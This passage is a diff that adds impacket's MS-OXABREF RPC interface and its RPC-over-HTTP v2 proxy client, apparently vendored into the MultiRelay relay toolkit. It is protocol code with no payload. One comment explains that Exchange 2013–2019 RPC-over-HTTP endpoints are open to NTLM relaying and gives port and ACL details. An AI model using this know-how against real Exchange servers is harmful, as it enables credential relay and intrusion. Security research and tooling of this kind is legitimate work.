tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py

@@ -0,0 +1,131 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   [MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+from impacket import hresult_errors, mapi_constants
+from impacket.dcerpc.v5.dtypes import NULL, STR, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_OXABREF = uuidtup_to_bin(('1544F5E0-613C-11D1-93DF-00C04FD7BD09','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in mapi_constants.ERROR_MESSAGES:
+            error_msg_short = mapi_constants.ERROR_MESSAGES[key]
+            return 'OXABREF SessionError: code: 0x%x - %s' % (self.error_code, error_msg_short)
+        elif key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'OXABREF SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'OXABREF SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUCHAR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class PPUCHAR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', PUCHAR_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.1.4.1 RfrGetNewDSA (opnum 0)
+class RfrGetNewDSA(NDRCALL):
+    opnum = 0
+    structure = (
+       ('ulFlags', ULONG),
+       ('pUserDN', STR),
+       ('ppszUnused', PPUCHAR_ARRAY),
+       ('ppszServer', PPUCHAR_ARRAY),
+    )
+
+class RfrGetNewDSAResponse(NDRCALL):
+    structure = (
+       ('ppszUnused', PPUCHAR_ARRAY),
+       ('ppszServer', PPUCHAR_ARRAY),
+    )
+
+# 3.1.4.2 RfrGetFQDNFromServerDN (opnum 1)
+class RfrGetFQDNFromServerDN(NDRCALL):
+    opnum = 1
+    structure = (
+       ('ulFlags', ULONG),
+       ('cbMailboxServerDN', ULONG),
+       ('szMailboxServerDN', STR),
+    )
+
+class RfrGetFQDNFromServerDNResponse(NDRCALL):
+    structure = (
+       ('ppszServerFQDN', PUCHAR_ARRAY),
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (RfrGetNewDSA, RfrGetNewDSAResponse),
+    1   : (RfrGetFQDNFromServerDN, RfrGetFQDNFromServerDNResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hRfrGetNewDSA(dce, pUserDN=''):
+    request = RfrGetNewDSA()
+    request['ulFlags'] = 0
+    request['pUserDN'] = checkNullString(pUserDN)
+    request['ppszUnused'] = NULL
+    request['ppszServer'] = '\x00'
+
+    resp = dce.request(request)
+    resp['ppszServer'] = resp['ppszServer'][:-1]
+
+    if request['ppszUnused'] != NULL:
+        resp['ppszUnused'] = resp['ppszUnused'][:-1]
+
+    return resp
+
+def hRfrGetFQDNFromServerDN(dce, szMailboxServerDN):
+    szMailboxServerDN = checkNullString(szMailboxServerDN)
+    request = RfrGetFQDNFromServerDN()
+    request['ulFlags'] = 0
+    request['szMailboxServerDN'] = szMailboxServerDN
+    request['cbMailboxServerDN'] = len(szMailboxServerDN)
+
+    resp = dce.request(request)
+    resp['ppszServerFQDN'] = resp['ppszServerFQDN'][:-1]
+
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py

@@ -0,0 +1,846 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Initial [MS-RCPH] Interface implementation
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+import re
+import binascii
+from struct import unpack
+
+from impacket import uuid, ntlm, system_errors, nt_errors, LOG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+from impacket.uuid import EMPTY_UUID
+from impacket.http import HTTPClientSecurityProvider, AUTH_BASIC
+from impacket.structure import Structure
+from impacket.dcerpc.v5.rpcrt import MSRPCHeader, \
+    MSRPC_RTS, PFC_FIRST_FRAG, PFC_LAST_FRAG
+
+class RPCProxyClientException(DCERPCException):
+    parser = re.compile(r'RPC Error: ([a-fA-F0-9]{1,8})')
+
+    def __init__(self, error_string=None, proxy_error=None):
+        rpc_error_code = None
+
+        if proxy_error is not None:
+            try:
+                search = self.parser.search(proxy_error)
+                rpc_error_code = int(search.group(1), 16)
+            except:
+                error_string += ': ' + proxy_error
+
+        DCERPCException.__init__(self, error_string, rpc_error_code)
+
+    def __str__(self):
+        if self.error_code is not None:
+            key = self.error_code
+            if key in system_errors.ERROR_MESSAGES:
+                error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+                return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+            elif key in nt_errors.ERROR_MESSAGES:
+                error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+                return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+            else:
+                return '%s: unknown code: 0x%x' % (self.error_string, self.error_code)
+        else:
+            return self.error_string
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+RPC_OVER_HTTP_v1 = 1
+RPC_OVER_HTTP_v2 = 2
+
+# Errors which might need handling
+
+# RPCProxyClient internal errors
+RPC_PROXY_REMOTE_NAME_NEEDED_ERR = 'Basic authentication in RPC proxy is used, ' \
+                                   'so coudn\'t obtain a target NetBIOS name from NTLMSSP to connect.'
+
+# Errors below contain a part of server responses
+RPC_PROXY_INVALID_RPC_PORT_ERR = 'Invalid RPC Port'
+RPC_PROXY_CONN_A1_0X6BA_ERR    = 'RPC Proxy CONN/A1 request failed, code: 0x6ba'
+RPC_PROXY_CONN_A1_404_ERR      = 'CONN/A1 request failed: HTTP/1.1 404 Not Found'
+RPC_PROXY_RPC_OUT_DATA_404_ERR = 'RPC_OUT_DATA channel: HTTP/1.1 404 Not Found'
+RPC_PROXY_CONN_A1_401_ERR      = 'CONN/A1 request failed: HTTP/1.1 401 Unauthorized'
+RPC_PROXY_HTTP_IN_DATA_401_ERR = 'RPC_IN_DATA channel: HTTP/1.1 401 Unauthorized'
+
+
+# 2.2.3.3 Forward Destinations
+FDClient   = 0x00000000
+FDInProxy  = 0x00000001
+FDServer   = 0x00000002
+FDOutProxy = 0x00000003
+
+RTS_FLAG_NONE            = 0x0000
+RTS_FLAG_PING            = 0x0001
+RTS_FLAG_OTHER_CMD       = 0x0002
+RTS_FLAG_RECYCLE_CHANNEL = 0x0004
+RTS_FLAG_IN_CHANNEL      = 0x0008
+RTS_FLAG_OUT_CHANNEL     = 0x0010
+RTS_FLAG_EOF             = 0x0020
+RTS_FLAG_ECHO            = 0x0040
+
+# 2.2.3.5 RTS Commands
+RTS_CMD_RECEIVE_WINDOW_SIZE      = 0x00000000
+RTS_CMD_FLOW_CONTROL_ACK         = 0x00000001
+RTS_CMD_CONNECTION_TIMEOUT       = 0x00000002
+RTS_CMD_COOKIE                   = 0x00000003
+RTS_CMD_CHANNEL_LIFETIME         = 0x00000004
+RTS_CMD_CLIENT_KEEPALIVE         = 0x00000005
+RTS_CMD_VERSION                  = 0x00000006
+RTS_CMD_EMPTY                    = 0x00000007
+RTS_CMD_PADDING                  = 0x00000008
+RTS_CMD_NEGATIVE_ANCE            = 0x00000009
+RTS_CMD_ANCE                     = 0x0000000A
+RTS_CMD_CLIENT_ADDRESS           = 0x0000000B
+RTS_CMD_ASSOCIATION_GROUP_ID     = 0x0000000C
+RTS_CMD_DESTINATION              = 0x0000000D
+RTS_CMD_PING_TRAFFIC_SENT_NOTIFY = 0x0000000E
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+# 2.2.3.1 RTS Cookie
+class RTSCookie(Structure):
+    structure = (
+        ('Cookie','16s=b"\\x00"*16'),
+    )
+
+# 2.2.3.2 Client Address
+class EncodedClientAddress(Structure):
+    structure = (
+        ('AddressType','<L=(0 if len(ClientAddress) == 4 else 1)'),
+        ('_ClientAddress','_-ClientAddress','4 if AddressType == 0 else 16'),
+        ('ClientAddress',':'),
+        ('Padding','12s=b"\\x00"*12'),
+    )
+
+# 2.2.3.4 Flow Control Acknowledgment
+class Ack(Structure):
+    structure = (
+        ('BytesReceived','<L=0'),
+        ('AvailableWindow','<L=0'),
+        ('ChannelCookie',':',RTSCookie),
+    )
+
+# 2.2.3.5.1 ReceiveWindowSize
+class ReceiveWindowSize(Structure):
+    structure = (
+        ('CommandType','<L=0'),
+        ('ReceiveWindowSize','<L=262144'),
+    )
+
+# 2.2.3.5.2 FlowControlAck
+class FlowControlAck(Structure):
+    structure = (
+        ('CommandType','<L=1'),
+        ('Ack',':',Ack),
+    )
+
+# 2.2.3.5.3 ConnectionTimeout
+class ConnectionTimeout(Structure):
+    structure = (
+        ('CommandType','<L=2'),
+        ('ConnectionTimeout','<L=120000'),
+    )
+
+# 2.2.3.5.4 Cookie
+class Cookie(Structure):
+    structure = (
+        ('CommandType','<L=3'),
+        ('Cookie',':',RTSCookie),
+    )
+
+# 2.2.3.5.5 ChannelLifetime
+class ChannelLifetime(Structure):
+    structure = (
+        ('CommandType','<L=4'),
+        ('ChannelLifetime','<L=1073741824'),
+    )
+
+# 2.2.3.5.6 ClientKeepalive
+#
+# By the spec, ClientKeepalive value can be 0 or in the inclusive
+# range of 60,000 through 4,294,967,295.
+# If it is 0, it MUST be interpreted as 300,000.
+#
+# But do not set it to 0, it will cause 0x6c0 rpc error.
+class ClientKeepalive(Structure):
+    structure = (
+        ('CommandType','<L=5'),
+        ('ClientKeepalive','<L=300000'),
+    )
+
+# 2.2.3.5.7 Version
+class Version(Structure):
+    structure = (
+        ('CommandType','<L=6'),
+        ('Version','<L=1'),
+    )
+
+# 2.2.3.5.8 Empty
+class Empty(Structure):
+    structure = (
+        ('CommandType','<L=7'),
+    )
+
+# 2.2.3.5.9 Padding
+class Padding(Structure):
+    structure = (
+        ('CommandType','<L=8'),
+        ('ConformanceCount','<L=len(Padding)'),
+        ('Padding','*ConformanceCount'),
+    )
+
+# 2.2.3.5.10 NegativeANCE
+class NegativeANCE(Structure):
+    structure = (
+        ('CommandType','<L=9'),
+    )
+
+# 2.2.3.5.11 ANCE
+class ANCE(Structure):
+    structure = (
+        ('CommandType','<L=0xA'),
+    )
+
+# 2.2.3.5.12 ClientAddress
+class ClientAddress(Structure):
+    structure = (
+        ('CommandType','<L=0xB'),
+        ('ClientAddress',':',EncodedClientAddress),
+    )
+
+# 2.2.3.5.13 AssociationGroupId
+class AssociationGroupId(Structure):
+    structure = (
+        ('CommandType','<L=0xC'),
+        ('AssociationGroupId',':',RTSCookie),
+    )
+
+# 2.2.3.5.14 Destination
+class Destination(Structure):
+    structure = (
+        ('CommandType','<L=0xD'),
+        ('Destination','<L'),
+    )
+
+# 2.2.3.5.15 PingTrafficSentNotify
+class PingTrafficSentNotify(Structure):
+    structure = (
+        ('CommandType','<L=0xE'),
+        ('PingTrafficSent','<L'),
+    )
+
+COMMANDS = {
+    0x0: ReceiveWindowSize,
+    0x1: FlowControlAck,
+    0x2: ConnectionTimeout,
+    0x3: Cookie,
+    0x4: ChannelLifetime,
+    0x5: ClientKeepalive,
+    0x6: Version,
+    0x7: Empty,
+    0x8: Padding,
+    0x9: NegativeANCE,
+    0xA: ANCE,
+    0xB: ClientAddress,
+    0xC: AssociationGroupId,
+    0xD: Destination,
+    0xE: PingTrafficSentNotify,
+}
+
+# 2.2.3.6.1 RTS PDU Header
+# The RTS PDU Header has the same layout as the common header of
+# the connection-oriented RPC PDU as specified in [C706] section 12.6.1,
+# with a few additional requirements around the contents of the header fields.
+class RTSHeader(MSRPCHeader):
+    _SIZE = 20
+    commonHdr = MSRPCHeader.commonHdr + (
+        ('Flags','<H=0'),             # 16
+        ('NumberOfCommands','<H=0'),  # 18
+    )
+
+    def __init__(self, data=None, alignment=0):
+        MSRPCHeader.__init__(self, data, alignment)
+        self['type'] = MSRPC_RTS
+        self['flags'] = PFC_FIRST_FRAG | PFC_LAST_FRAG
+        self['auth_length'] = 0
+        self['call_id'] = 0
+
+# 2.2.4.2 CONN/A1 RTS PDU
+#
+# The CONN/A1 RTS PDU MUST be sent from the client to the outbound proxy on the OUT channel to
+# initiate the establishment of a virtual connection.
+class CONN_A1_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('VirtualConnectionCookie',':',Cookie),
+        ('OutChannelCookie',':',Cookie),
+        ('ReceiveWindowSize',':',ReceiveWindowSize),
+    )
+
+# 2.2.4.5 CONN/B1 RTS PDU
+#
+# The CONN/B1 RTS PDU MUST be sent from the client to the inbound proxy on the IN channel to
+# initiate the establishment of a virtual connection.
+class CONN_B1_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('VirtualConnectionCookie',':',Cookie),
+        ('INChannelCookie',':',Cookie),
+        ('ChannelLifetime',':',ChannelLifetime),
+        ('ClientKeepalive',':',ClientKeepalive),
+        ('AssociationGroupId',':',AssociationGroupId),
+    )
+
+# 2.2.4.4 CONN/A3 RTS PDU
+#
+# The CONN/A3 RTS PDU MUST be sent from the outbound proxy to the client on the OUT channel to
+# continue the establishment of the virtual connection.
+class CONN_A3_RTS_PDU(Structure):
+    structure = (
+        ('ConnectionTimeout',':',ConnectionTimeout),
+    )
+
+# 2.2.4.9 CONN/C2 RTS PDU
+#
+# The CONN/C2 RTS PDU MUST be sent from the outbound proxy to the client on the OUT channel to
+# notify it that a virtual connection has been established.
+class CONN_C2_RTS_PDU(Structure):
+    structure = (
+        ('Version',':',Version),
+        ('ReceiveWindowSize',':',ReceiveWindowSize),
+        ('ConnectionTimeout',':',ConnectionTimeout),
+    )
+
+# 2.2.4.51 FlowControlAckWithDestination RTS PDU
+class FlowControlAckWithDestination_RTS_PDU(Structure):
+    structure = (
+        ('Destination',':',Destination),
+        ('FlowControlAck',':',FlowControlAck),
+    )
+
+################################################################################
+# HELPERS
+################################################################################
+def hCONN_A1(virtualConnectionCookie=EMPTY_UUID, outChannelCookie=EMPTY_UUID, receiveWindowSize=262144):
+    conn_a1 = CONN_A1_RTS_PDU()
+    conn_a1['Version'] = Version()
+    conn_a1['VirtualConnectionCookie'] = Cookie()
+    conn_a1['VirtualConnectionCookie']['Cookie'] = virtualConnectionCookie
+    conn_a1['OutChannelCookie'] = Cookie()
+    conn_a1['OutChannelCookie']['Cookie'] = outChannelCookie
+    conn_a1['ReceiveWindowSize'] = ReceiveWindowSize()
+    conn_a1['ReceiveWindowSize']['ReceiveWindowSize'] = receiveWindowSize
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_NONE
+    packet['NumberOfCommands'] = len(conn_a1.structure)
+    packet['pduData'] = conn_a1.getData()
+
+    return packet.getData()
+
+def hCONN_B1(virtualConnectionCookie=EMPTY_UUID, inChannelCookie=EMPTY_UUID, associationGroupId=EMPTY_UUID):
+    conn_b1 = CONN_B1_RTS_PDU()
+    conn_b1['Version'] = Version()
+    conn_b1['VirtualConnectionCookie'] = Cookie()
+    conn_b1['VirtualConnectionCookie']['Cookie'] = virtualConnectionCookie
+    conn_b1['INChannelCookie'] = Cookie()
+    conn_b1['INChannelCookie']['Cookie'] = inChannelCookie
+    conn_b1['ChannelLifetime'] = ChannelLifetime()
+    conn_b1['ClientKeepalive'] = ClientKeepalive()
+    conn_b1['AssociationGroupId'] = AssociationGroupId()
+    conn_b1['AssociationGroupId']['AssociationGroupId'] = RTSCookie()
+    conn_b1['AssociationGroupId']['AssociationGroupId']['Cookie'] = associationGroupId
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_NONE
+    packet['NumberOfCommands'] = len(conn_b1.structure)
+    packet['pduData'] = conn_b1.getData()
+
+    return packet.getData()
+
+def hFlowControlAckWithDestination(destination, bytesReceived, availableWindow, channelCookie):
+    rts_pdu = FlowControlAckWithDestination_RTS_PDU()
+    rts_pdu['Destination'] = Destination()
+    rts_pdu['Destination']['Destination'] = destination
+    rts_pdu['FlowControlAck'] = FlowControlAck()
+    rts_pdu['FlowControlAck']['Ack'] = Ack()
+    rts_pdu['FlowControlAck']['Ack']['BytesReceived'] = bytesReceived
+    rts_pdu['FlowControlAck']['Ack']['AvailableWindow'] = availableWindow
+
+    # Cookie of the channel for which the traffic received is being acknowledged
+    rts_pdu['FlowControlAck']['Ack']['ChannelCookie'] = RTSCookie()
+    rts_pdu['FlowControlAck']['Ack']['ChannelCookie']['Cookie'] = channelCookie
+
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_OTHER_CMD
+    packet['NumberOfCommands'] = len(rts_pdu.structure)
+    packet['pduData'] = rts_pdu.getData()
+
+    return packet.getData()
+
+def hPing():
+    packet = RTSHeader()
+    packet['Flags'] = RTS_FLAG_PING
+
+    return packet.getData()
+
+################################################################################
+# CLASSES
+################################################################################
+class RPCProxyClient(HTTPClientSecurityProvider):
+    RECV_SIZE = 8192
+    default_headers = {'User-Agent'   : 'MSRPC',
+                       'Cache-Control': 'no-cache',
+                       'Connection'   : 'Keep-Alive',
+                       'Expect'       : '100-continue',
+                       'Accept'       : 'application/rpc',
+                       'Pragma'       : 'No-cache'
+                      }
+
+    def __init__(self, remoteName=None, dstport=593):
+        HTTPClientSecurityProvider.__init__(self)
+        self.__remoteName  = remoteName
+        self.__dstport     = dstport
+
+        # Chosen auth type
+        self.__auth_type = None
+
+        self.init_state()
+
+    def init_state(self):
+        self.__channels    = {}
+
+        self.__inChannelCookie         = uuid.generate()
+        self.__outChannelCookie        = uuid.generate()
+        self.__associationGroupId      = uuid.generate()
+        self.__virtualConnectionCookie = uuid.generate()
+
+        self.__serverConnectionTimeout = None
+        self.__serverReceiveWindowSize = None
+        self.__availableWindowAdvertised = 262144 # 256k
+        self.__receiverAvailableWindow = self.__availableWindowAdvertised
+        self.__bytesReceived = 0
+
+        self.__serverChunked = False
+        self.__readBuffer = b''
+        self.__chunkLeft = 0
+
+        self.rts_ping_received = False
+
+    def set_proxy_credentials(self, username, password, domain='', lmhash='', nthash=''):
+        LOG.error("DeprecationWarning: Call to deprecated method set_proxy_credentials (use set_credentials).")
+        self.set_credentials(username, password, domain, lmhash, nthash)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        HTTPClientSecurityProvider.set_credentials(self, username, password,
+            domain, lmhash, nthash, aesKey, TGT, TGS)
+
+    def create_rpc_in_channel(self):
+        headers = self.default_headers.copy()
+        headers['Content-Length'] = '1073741824'
+
+        self.create_channel('RPC_IN_DATA', headers)
+
+    def create_rpc_out_channel(self):
+        headers = self.default_headers.copy()
+        headers['Content-Length'] = '76'
+
+        self.create_channel('RPC_OUT_DATA', headers)
+
+    def create_channel(self, method, headers):
+        self.__channels[method] = HTTPClientSecurityProvider.connect(self, self._rpcProxyUrl.scheme,
+                                    self._rpcProxyUrl.netloc)
+
+        auth_headers = HTTPClientSecurityProvider.get_auth_headers(self, self.__channels[method],
+                           method, self._rpcProxyUrl.path, headers)[0]
+
+        headers_final = {}
+        headers_final.update(headers)
+        headers_final.update(auth_headers)
+
+        self.__auth_type = HTTPClientSecurityProvider.get_auth_type(self)
+
+        # To connect to an RPC Server, we need to let the RPC Proxy know
+        # where to connect. The target RPC Server name and its port are passed
+        # in the query of the HTTP request. The target RPC Server must be the ncacn_http
+        # service.
+        #
+        # The utilized format: /rpc/rpcproxy.dll?RemoteName:RemotePort
+        #
+        # For RDG servers, you can specify localhost:3388, but in other cases you cannot
+        # use localhost as there will be no ACL for it.
+        #
+        # To know what RemoteName to use, we rely on Default ACL. It's specified
+        # in the HKLM\SOFTWARE\Microsoft\Rpc\RpcProxy key:
+        #
+        # ValidPorts    REG_SZ   COMPANYSERVER04:593;COMPANYSERVER04:49152-65535
+        #
+        # In this way, we can at least connect to the endpoint mapper on port 593.
+        # So, if the caller set remoteName to an empty string, we assume the target
+        # is the RPC Proxy server itself, and get its NetBIOS name from the NTLMSSP.
+        #
+        # Interestingly, if the administrator renames the server after RPC Proxy installation
+        # or joins the server to the domain after RPC Proxy installation, the ACL will remain
+        # the original. So, sometimes the ValidPorts values have the format WIN-JCKEDQVDOQU, and
+        # we are not able to use them.
+        #
+        # For Exchange servers, the value of the default ACL doesn't matter as they
+        # allow connections by their own mechanisms:
+        # - Exchange 2003 / 2007 / 2010 servers add their own ACL, which includes
+        #   NetBIOS names of all Exchange servers (and some other servers).
+        #   This ACL is regularly and automatically updated on each server.
+        #   Allowed ports: 6001-6004
+        #
+        #   6001 is used for MS-OXCRPC
+        #   6002 is used for MS-OXABREF
+        #   6003 is not used
+        #   6004 is used for MS-OXNSPI
+        #
+        #   Tests on Exchange 2010 show that MS-OXNSPI and MS-OXABREF are available
+        #   on both 6002 and 6004.
+        #
+        # - Exchange 2013 / 2016 / 2019 servers process RemoteName on their own
+        #   (via RpcProxyShim.dll), and the NetBIOS name format is supported only for
+        #   backward compatibility.
+        #
+        #   ! Default ACL is never used, so there is no way to connect to the endpoint mapper!
+        #
+        #   Allowed ports: 6001-6004
+        #
+        #   6001 is used for MS-OXCRPC
+        #   6002 is used for MS-OXABREF
+        #   6003 is not used
+        #   6004 is used for MS-OXNSPI
+        #
+        # Tests show that all protocols are available on the 6001 / 6002 / 6004 ports via
+        # RPC over HTTP v2, and the separation is only used for backward compatibility.
+        #
+        # The pure ncacn_http endpoint is available only on the 6001 TCP/IP port.
+        #
+        # RpcProxyShim.dll allows you to skip authentication on the RPC level to get
+        # a faster connection, and it makes Exchange 2013 / 2016 / 2019 RPC over HTTP v2
+        # endpoints vulnerable to NTLM-Relaying attacks.
+        #
+        # If the target is Exchange behind Microsoft TMG, you most likely need to specify
+        # the remote name manually using the value from /autodiscover/autodiscover.xml.
+        # Note that /autodiscover/autodiscover.xml might not be available with
+        # a non-outlook User-Agent.
+        #
+        # There may be multiple RPC Proxy servers with different NetBIOS names on
+        # a single external IP. We store the first one's NetBIOS name and use it for all
+        # the following channels.
+        # It's acceptable to assume all RPC Proxies have the same ACLs (true for Exchange).
+        if not self.__remoteName and self.__auth_type == AUTH_BASIC:
+            raise RPCProxyClientException(RPC_PROXY_REMOTE_NAME_NEEDED_ERR)
+
+        if not self.__remoteName:
+            ntlmssp = self.get_ntlmssp_info()
+            self.__remoteName = ntlmssp[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
+            self._stringbinding.set_network_address(self.__remoteName)
+            LOG.debug('StringBinding has been changed to %s' % self._stringbinding)
+
+        if not self._rpcProxyUrl.query:
+            query = self.__remoteName + ':' + str(self.__dstport)
+            self._rpcProxyUrl = self._rpcProxyUrl._replace(query=query)
+
+        path = self._rpcProxyUrl.path + '?' + self._rpcProxyUrl.query
+
+        self.__channels[method].request(method, path, headers=headers_final)
+        self._read_100_continue(method)
+
+    def _read_100_continue(self, method):
+        resp = self.__channels[method].sock.recv(self.RECV_SIZE)
+
+        while resp.find(b'\r\n\r\n') == -1:
+            resp += self.__channels[method].sock.recv(self.RECV_SIZE)
+
+        # Continue responses can have multiple lines, for example:
+        #
+        # HTTP/1.1 100 Continue
+        # Via: 1.1 FIREWALL1
+        #
+        # Don't expect the response to contain "100 Continue\r\n\r\n"
+        if resp[9:23] != b'100 Continue\r\n':
+            try:
+                # The server (IIS) may return localized error messages in
+                # the first line. Tests shown they are in UTF-8.
+                resp = resp.split(b'\r\n')[0].decode("UTF-8", errors='replace')
+
+                raise RPCProxyClientException('RPC Proxy Client: %s authentication failed in %s channel' %
+                    (self.__auth_type, method), proxy_error=resp)
+            except (IndexError, KeyError, AttributeError):
+                raise RPCProxyClientException('RPC Proxy Client: %s authentication failed in %s channel' %
+                    (self.__auth_type, method))
+
+    def create_tunnel(self):
+        # 3.2.1.5.3.1 Connection Establishment
+        packet = hCONN_A1(self.__virtualConnectionCookie, self.__outChannelCookie, self.__availableWindowAdvertised)
+        self.get_socket_out().send(packet)
+
+        packet = hCONN_B1(self.__virtualConnectionCookie, self.__inChannelCookie, self.__associationGroupId)
+        self.get_socket_in().send(packet)
+
+        resp = self.get_socket_out().recv(self.RECV_SIZE)
+
+        while resp.find(b'\r\n\r\n') == -1:
+            resp += self.get_socket_out().recv(self.RECV_SIZE)
+
+        if resp[9:12] != b'200':
+            try:
+                # The server (IIS) may return localized error messages in
+                # the first line. Tests shown they are in UTF-8.
+                resp = resp.split(b'\r\n')[0].decode("UTF-8", errors='replace')
+
+                raise RPCProxyClientException('RPC Proxy CONN/A1 request failed', proxy_error=resp)
+            except (IndexError, KeyError, AttributeError):
+                raise RPCProxyClientException('RPC Proxy CONN/A1 request failed')
+
+        if b'Transfer-Encoding: chunked' in resp:
+            self.__serverChunked = True
+
+        # If the body is here, let's send it to rpc_out_recv1()
+        self.__readBuffer = resp[resp.find(b'\r\n\r\n') + 4:]
+
+        # Recieving and parsing CONN/A3
+        conn_a3_rpc = self.rpc_out_read_pkt()
+        conn_a3_pdu = RTSHeader(conn_a3_rpc)['pduData']
+        conn_a3 = CONN_A3_RTS_PDU(conn_a3_pdu)
+        self.__serverConnectionTimeout = conn_a3['ConnectionTimeout']['ConnectionTimeout']
+
+        # Recieving and parsing CONN/C2
+        conn_c2_rpc = self.rpc_out_read_pkt()
+        conn_c2_pdu = RTSHeader(conn_c2_rpc)['pduData']
+        conn_c2 = CONN_C2_RTS_PDU(conn_c2_pdu)
+        self.__serverReceiveWindowSize = conn_c2['ReceiveWindowSize']['ReceiveWindowSize']
+
+    def get_socket_in(self):
+        return self.__channels['RPC_IN_DATA'].sock
+
+    def get_socket_out(self):
+        return self.__channels['RPC_OUT_DATA'].sock
+
+    def close_rpc_in_channel(self):
+        return self.__channels['RPC_IN_DATA'].close()
+
+    def close_rpc_out_channel(self):
+        return self.__channels['RPC_OUT_DATA'].close()
+
+    def check_http_error(self, buffer):
+        if buffer[:22] == b'HTTP/1.0 503 RPC Error':
+            raise RPCProxyClientException('RPC Proxy request failed', proxy_error=buffer)
+
+    def rpc_out_recv1(self, amt=None):
+        # Read with at most one underlying system call.
+        # The function MUST return the maximum amt bytes.
+        #
+        # Strictly speaking, it may cause more than one read,
+        # but that is ok, since that is to satisfy the chunked protocol.
+        sock = self.get_socket_out()
+
+        if self.__serverChunked is False:
+            if len(self.__readBuffer) > 0:
+                buffer = self.__readBuffer
+                self.__readBuffer = b''
+            else:
+                # Let's read RECV_SIZE bytes and not amt bytes.
+                # We would need to check the answer for HTTP errors, as
+                # they can just appear in the middle of the stream.
+                buffer = sock.recv(self.RECV_SIZE)
+
+            self.check_http_error(buffer)
+
+            if len(buffer) <= amt:
+                return buffer
+
+            # We received more than we need
+            self.__readBuffer = buffer[amt:]
+            return buffer[:amt]
+
+        # Check if the previous chunk is still there
+        if self.__chunkLeft > 0:
+            # If the previous chunk is still there,
+            # just give the caller what we already have
+            if amt >= self.__chunkLeft:
+                buffer = self.__readBuffer[:self.__chunkLeft]
+                # We may have recieved a part of a new chunk
+                self.__readBuffer = self.__readBuffer[self.__chunkLeft + 2:]
+                self.__chunkLeft = 0
+
+                return buffer
+            else:
+                buffer = self.__readBuffer[:amt]
+                self.__readBuffer = self.__readBuffer[amt:]
+                self.__chunkLeft -= amt
+
+                return buffer
+
+        # Let's start to process a new chunk
+        buffer = self.__readBuffer
+        self.__readBuffer = b''
+
+        self.check_http_error(buffer)
+
+        # Let's receive a chunk size field which ends with CRLF
+        # For Microsoft TMG 2010 it can cause more than one read
+        while buffer.find(b'\r\n') == -1:
+            buffer += sock.recv(self.RECV_SIZE)
+            self.check_http_error(buffer)
+
+        chunksize = int(buffer[:buffer.find(b'\r\n')], 16)
+        buffer = buffer[buffer.find(b'\r\n') + 2:]
+
+        # Let's read at least our chunk including final CRLF
+        while len(buffer) - 2 < chunksize:
+            buffer += sock.recv(chunksize - len(buffer) + 2)
+
+        # We should not be using any information from
+        # the TCP level to determine HTTP boundaries.
+        # So, we may have received more than we need.
+        if len(buffer) - 2 > chunksize:
+            self.__readBuffer = buffer[chunksize + 2:]
+            buffer = buffer[:chunksize + 2]
+
+        # Checking the amt
+        if len(buffer) - 2 > amt:
+            self.__chunkLeft = chunksize - amt
+            # We may have recieved a part of a new chunk before,
+            # so the concatenation is crucual
+            self.__readBuffer = buffer[amt:] + self.__readBuffer
+
+            return buffer[:amt]
+        else:
+            # Removing CRLF
+            return buffer[:-2]
+
+    def send(self, data, forceWriteAndx=0, forceRecv=0):
+        # We don't use chunked encoding for IN channel as
+        # Microsoft software is developed this way.
+        # If you do this, it may fail.
+        self.get_socket_in().send(data)
+
+    def rpc_out_read_pkt(self, handle_rts=False):
+        while True:
+            response_data = b''
+
+            # Let's receive common RPC header and no more
+            #
+            # C706
+            # 12.4 Common Fields
+            # Header encodings differ between connectionless and connection-oriented PDUs.
